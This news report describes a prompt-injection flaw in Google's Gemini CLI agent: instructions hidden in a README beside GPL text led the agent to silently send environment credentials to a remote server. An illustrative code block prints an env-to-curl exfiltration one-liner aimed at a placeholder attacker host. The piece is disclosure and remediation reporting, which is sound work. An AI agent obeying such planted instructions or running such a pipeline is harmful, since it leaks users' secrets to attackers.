Google’s Gemini CLI agent could run malicious code silently

The recently introduced Google Gemini CLI agent, which provides a text-based command-line interface to the company’s artificial intelligence large language models, could be tricked into silently executing malicious commands, a security researcher has discovered.

Tracebit security researcher Sam Cox discovered the vulnerability, in which, “through a toxic combination of improper validation, prompt injection and misleading UX, inspecting untrusted code consistently leads to silent execution of malicious commands.”

By hiding a prompt injection inside a README.md file that also contained the full text of the GNU General Public Licence, accompanying a benign Python script the target would be likely to run, Cox was able to coax Gemini into exfiltrating credentials to a listening remote server using the “env” and “curl” commands.
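
As an illustration only, the exfiltration step Cox describes amounts to a short shell pipeline of the kind sketched below; the endpoint shown is a placeholder, not the server used in the research, and the exact command Gemini was coaxed into running may have differed.

```sh
# Illustrative sketch of the exfiltration described above (placeholder URL):
# dump the environment, which commonly holds API keys and other credentials,
# and POST it to a server the attacker is listening on.
env | curl --silent -X POST --data-binary @- https://attacker.example.com/collect
```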

Google initially triaged the vulnerability as Priority 2, Severity 4 in its Bug Hunters program after Cox reported it on June 27.

About three weeks later, Google reclassified the vulnerability as the most serious rating, Priority 1, Severity 1, which requires urgent attention as it could lead to significant data compromise, unauthorised access and/or code execution.

Users are advised to upgrade to Gemini CLI 0.1.14, which adds safeguards for shell command execution and mitigates the attack.

Enabling “sandboxing”, which runs the agent in an isolated environment to protect the user’s system, would also prevent the attack Cox discovered.

However, Gemini CLI runs without sandboxing by default after installation, although the tool prominently warns users when that is the case.
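
For reference, a typical remediation on an affected machine might look like the commands below; the npm package name and the --sandbox flag reflect Gemini CLI’s documented distribution and options as best understood here, so verify them against gemini --help before relying on them.

```sh
# Upgrade to a patched release (0.1.14 or later) via npm, the CLI's
# usual distribution channel (package name assumed here).
npm install -g @google/gemini-cli@latest

# Launch with sandboxing enabled so shell commands run in an isolated
# environment rather than directly on the host (flag assumed; check --help).
gemini --sandbox
```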

